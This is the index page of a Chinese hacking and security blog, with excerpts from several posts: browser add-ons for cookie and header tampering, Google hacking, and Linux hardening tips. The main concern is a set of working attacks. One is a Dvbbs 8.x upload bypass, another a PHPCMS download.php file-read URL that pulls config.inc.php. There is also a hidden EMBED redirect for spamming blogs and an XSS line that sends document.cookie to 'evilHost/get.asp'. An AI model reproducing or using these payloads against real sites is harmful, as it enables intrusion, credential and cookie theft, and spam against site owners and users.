Chinadu's Blog

1. Add N Edit Cookies 查看和修改本地的Cookie，Cookie欺骗必备。
下载：http://code.google.com/p/editcookie/downloads/list

2. User Agent Switcher 修改浏览器的User Agent，可以用来XSS。
下载：https://addons.mozilla.org/zh-CN/firefox/addon/59

3. RefControl 修改Referer引用，也可以用来XSS或者突破一些防盗链。
下载：https://addons.mozilla.org/zh-CN/firefox/addon/953

4.Live HTTP Headers 记录本地的Get和Post数据，并可修改数据后重新提交。
下载：https://addons.mozilla.org/zh-CN/firefox/addon/3829

5. Poster 用来Post和Get数据。
下载：https://addons.mozilla.org/fr/firefox/addon/2691
阅读全文...

今天为论坛进行服务器空间的转移~~~先顺利将Mysql数据库用phpmyadmin导出~~
然后在新服务器上建好数据库后，然后进行导入！可是因为MySQL数据库的.sql文件大于2MB。所以在导入时就提示说超过2048KB的错误，不让导入….于是就引出了此文的解决办法，呵呵

解决办法：
阅读全文...

PS:这是很老的一篇文章了，最近要用，记录一下。
google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单...

google hacking的简单实现

记得以前看见过一篇文章写的就是简单的通过用www.google.com来搜索dvbbs6.mdb或conn.inc来获得一些站点的敏感信息.其实使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
阅读全文...

作者：Oldjun

不经意的遇到这个国外的CMS系统：XOOPS 2.2.6，google了下，版本比较老了，没发现有什么已知漏洞，于是下源码自己看，还是没发现有啥可以利用了，只不过看到了几个鸡肋，于是发出来。

XOOPS is a web application platform written in PHP for the MySQL database.Its object orientation makes it an ideal tool for developing small or large community websites, intra company and corporate portals, weblogs and much more. (Reference : http://www.xoops.org).

1.Local File Inclusion Vulnerabilities：

/*
works with:
magic_quotes_gpc = Off
*/

现在能遇到这个php配置的，简直可以去买彩票了，所以够鸡肋的。

Local File Include vulnerability found in scripts:
modules/system/admin.php

看源码：
阅读全文...

影响版本
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0

注册用户-我的主页-个人空间管理
userspace.asp?sid=0&act=modifyset（此URL在找不到个人空间管理情况下加）
然后编辑CSS风格-文件管理
Dv_plus/myspace/script/filemange.asp
上传 *.asp;*jpg

直接删除Dv_plus/myspace/script/filemange.asp，

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:eskry
前一段时间一直在研究网站暴力推广
在研究通过博客暴力推广时略有所得
和大家分享下
这次会利用到一个小工具
就是前一段时间很多人所说的MP3 0day
我写了一个利用工具
给几个朋友也玩了几个月了
这次也一起放出来吧
没什么技术含量,大牛飘过吧
该方法理论上通杀所有支持源码编辑的博客
具体利用方法如下:
先用随文附带的利用工具生成一个MP3文件
地址中填自己要挂广告的网址
将MP3文件上传到自己的空间里
把MP3文件网络链接地址记下
然后进入新浪或网易等博客
写一篇日志
选择源码编辑模式
在当中加入
<EMBED height=1 type=application/x-mplayer2 align=baseline pluginspage="" width=1
src=http://127.0.0.1/test.mp3 ALLOWSCRIPTACCESS="samedomain" BORDER="0" AUTOSTART="1"></EMBED>
http://127.0.0.1/test.mp3 替换为你的MP3文件网络链接地址
点击日志
就会自动转向你指定的页面
一次暴力广告推广就成功了

点击下载

漏洞文件download.php

PHP代码：

< ?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //注意!!
if(emptyempty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k);

if(isset($i)) $downid = intval($i);
if(!isset($m)) showmessage($LANG['illegal_parameters']);
if(emptyempty($f)) showmessage('地址失效');
if(!$i || $m<0) showmessage($LANG['illegal_parameters']);
if(!isset($t)) showmessage($LANG['illegal_parameters']);
if(!isset($ip)) showmessage($LANG['illegal_parameters']);
$starttime = intval($t);

$fileurl = trim($f);
if(!$downid || emptyempty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != IP) showmessage($LANG['illegal_parameters']);

$endtime = TIME - $starttime;
if($endtime > 3600) showmessage('地址失效');
if($m) $fileurl = trim($s).trim($fileurl);

if(strpos($fileurl, '://'))//远程文件
{
header("Location: $fileurl");
}
else//本地文件
{
if($d == 0)
{
header("Location: ".SITE_URL.$fileurl);
}
else
{
$fileurl = file_exists($fileurl) ? stripslashes($fileurl) : PHPCMS_ROOT.$fileurl;//此处可能为物理路径
$filename = basename($fileurl);
if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl))//处理中文文件
{
$filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
$filename = urldecode(basename($filename));
}
file_down($fileurl, $filename);
}
}
?>

function file_down($filepath, $filename = '')
{
if(!$filename) $filename = basename($filepath);
if(is_ie()) $filename = rawurlencode($filename); $filetype = fileext($filename);
$filesize = sprintf("%u", filesize($filepath));
if(ob_get_length() !== false) @ob_end_clean();
header('Pragma: public');
header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: pre-check=0, post-check=0, max-age=0');
header('Content-Transfer-Encoding: binary');
header('Content-Encoding: none');
header('Content-type: '.$filetype);
header('Content-Disposition: attachment; filename="'.$filename.'"');
header('Content-length: '.$filesize);
readfile($filepath);
exit;

其实$i,$m,$f,$ip等都是地址栏的参数没有过滤(在down.php中可以看到)由parse_str($a_k)解释后得到的,又由于$a_k 是经phpcms_auth($a_k, 'DECODE', AUTH_KEY)解密后才能得到参数,但我本地测试构造$a_k变量的加密值不成功就换了个方法,把$a_k构造成不存在的参数然后下面的$i,$m,$f,$ip我就直接从地址栏中添加!测试如下:

http://www.xxxx.cn/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=119.123.178.19&s=m/&d=1

浩瀚的大海，深邃的崖洞，在一片银白的沙滩上，膝盖上放着笔记本的您正姿态优雅地在躺椅上查看最新的股价信息、足球资讯，正在享受自由、可移动、随时随地的无线网络所带来的无限空间。突然，鼠标停滞，屏幕模糊，系统瘫痪，随即自动关机，在那一刹那，您的第一感觉是什么?没错，病毒、黑客，或者是木马!

　　这就是无线网络的两面性。一方面，它可以带给用户飞一般网上冲浪的感觉，而另一方面，它也可以带给用户不确定的网络安全。和有线网络一样，病毒、黑客、蠕虫，木马、间谍软件，随时都在威胁着无线网络的安全，并且无线网络比有线网络更容易遭侵害，因为用户在使用无线网络时的安全意识和掌握的技术手段还比较差。不能因为有人用枪杀人而停止枪的生产，同样不能因为无线网络会带来安全隐患而不去推广无线网络的使用。其实，无线网络安全隐患并不可怕，只要掌握一些基本的无线网络安全技术，就完全可以畅游网络而不惧病毒。

　　网络：加强安全防范迫在眉睫

　　在书房呆累了，小明抗着笔记本来到了客厅，奇怪的发现上网的速度怎么突然变快了?难道远离了AP(AP 在书房)上网速度还更快?当然不会，这是因为由于客厅离隔壁的书房较近的原因，小明无意间访问了邻居的无线网络，而邻居申请的网络速度比小明的快所致。我们假设，小明接着访问了邻居的共享磁盘，正好磁盘里有银行卡密码、投标书、个人日记，甚至是一些个人图片，结果会怎么样?

　　为了让更多的人可以访问到，无线网络选择了通过特定的无线电波来传送，在这个发射频率的有效范围内，任何具有合适接收设备的人都可以捕获该频率的信号，进而进入目标网络一个员工在公司阳台也可以访问公司网络，但这同时也意味着，蹲在公司阳台下面的竞争对手的情报人员也可以访问公司的网络，畅通无阻，而这个人拿着笔记本，也可以到全国各地的竞争对手阳台下去拿一些情报。
阅读全文...

cookie窃取是最常见的跨站攻击之一，不管是用img,iframe方式，还是基于入库型或非入库的XSS，整个操作只需要带Cookie浏览器请求了某个的url即可完成。

本人偏爱Image：

img = new Image(); img.src = "http://evilHost/get.asp?cookie=" document.cookie;img.width=0;img.height=0

盗cookie脚本：

还是一个比较简单的程序，经过一点完善，在获取Cookie同时也记录的时间和IP，比较智能化与人性化，务求达到一个更好的用户体验，呵呵！

get.asp
code:
阅读全文...

马化腾带着一大批产品高管自上而下，持之以恒地推动产品本位的管理体制规范化，并不断地创新和优化这套体制，使得整个公司上上下下融入了“产品的基因”，最终成就了“产品的腾讯”。

1、设置一个质量监控小组，由经验非常丰富的高Level的产品人员构成，赋予他们很大的权力，去监控和规范所有的产品项目。并且用KPI来制约产品项目服从这些规范。为了不搞教条主义，很多规范都是在立项之初，由项目经理和这个小组共同确认的，未必是硬性指派，一经确认就受到严格监控。确保好的规范不流于空喊口号。

2、每个产品都设置公开的反馈论坛，突出外部入口，积极征询用户意见，并以内部轮班方式回复“每一条”有价值的反馈，要求以“人对人，面对面”的沟通态度来进行解答，禁止机械问答。公司高层（包括小马哥）不定期巡查每一个产品论坛，一旦发现有不认真回复用户的情况，立即予以训诫。确保产品人员与用户长期保持近距离接触。

3、每个产品都设置内部的交流平台，分为两部分，一块类似留言板，由产品主管发布项目的进度、动态；另一块是论坛，向公司内部所有人开放，接纳反馈。在腾讯内部已经形成了非常活跃的氛围，甚至以该平台人气高涨为荣（至少你主管会喜欢这个），利用这个平台跨项目提意见，或是项目组内部交流思维碎片都很常见，达到了群策群力，内部监督的效果。
阅读全文...

前景分析：
22岁的刘昉在高中辍学后，先后做过食品销售、商场员工、电子设备维护员等，这些经历使得他精于与各式各样的人打交道。但在接下来的5年，他疯狂的迷上了计算机，尤其对黑客技术感兴趣，并涉足了地下黑客经济。他接的业务很多，如对私服的DDOS、编写针对性的网银键盘记录工具、游戏装备盗取洗钱等。
但刘昉对重复性攻击感到厌倦，显然，有刺激的事物往往令人更感兴趣。这次，他盯上了一套防火墙，由北京中关村恒天公司研发。据说这套防火墙一公布便在业界大受好评，刘昉则不以为然，在他看来，防火墙的源代码才能说服他。

一、销售部门的后门
刘昉从对外公布的防火墙软件中的菜单栏“帮助”处找到了恒天公司销售部与市场部的联系电话，接着他

便以某公司采购部经理的身份拨通了恒天公司销售部的电话。

恒天公司（以下简称恒）：“您好，这里是恒天公司销售部”
刘漂阳（以下简称刘）：“嗯，我是北京亚太机电股份有限公司采购部经理刘漂阳，我们公司需要500份防火墙软件产品，我参考了网上的防火墙横向评测，再三考虑后决定选择你们的产品，现在我想知道你们给我的价格是否令人满意。”
恒：“刘经理，我们的防火墙有三种不同的版本，分别为个人版、专业版和企业版。如果你选择企业版，它的单价是88元，总价为4.4万；如果你批发购买、那么价格相对优惠，仅3.2万。”
刘：“嗯，没有高于我们公司原始估价，不过我们公司网络环境相当复杂，你们公司是否可以定制一套，实现封堵公司员工聊天与下载的功能？”
恒：“这个……请让我问问软件开发部，请稍等。”
刘：“好的”
阅读全文...

关于分区

一个潜在的黑客如果要攻击你的Linux服务器，他首先就会尝试缓冲区溢出。在过去的几年中，以缓冲区溢出为类型的安全漏洞是最为常见的一种形式了。更为严重的是，缓冲区溢出漏洞占了远程网络攻击的绝大多数，这种攻击可以轻易使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权！

为了防止此类攻击，我们从安装系统时就应该注意。如果用root分区纪录数据，如log文件和email，就可能因为拒绝服务产生大量日志或垃 圾邮件，从而导致系统崩溃。所以建议为/var开辟单独的分区，用来存放日志和邮件，以避免root分区被溢出。最好为特殊的应用程序单独开一个分区，特 别是可以产生大量日志的程序，还有建议为/home单独分一个区，这样他们就不能填满/分区了，从而就避免了部分针对Linux分区溢出的恶意攻击。

关于BIOS

记着要在BIOS设置中设定一个BIOS密码，不接收软盘启动。这样可以阻止不怀好意的人用专门的启动盘启动你的Linux系统，并避免别人更改BIOS设置，如更改软盘启动设置或不弹出密码框直接启动服务器等等。

关于口令

口令是系统中认证用户的主要手段，系统安装时默认的口令最小长度通常为5，但为保证口令不易被猜测攻击，可增加口令的最小长度，至少等于8。为 此，需修改文件/etc/login.defs中参数PASS_MIN_LEN（口令最小长度）。同时应限制口令使用时间，保证定期更换口令，建议修改参 数PASS_MIN_DAYS（口令使用时间）。
阅读全文...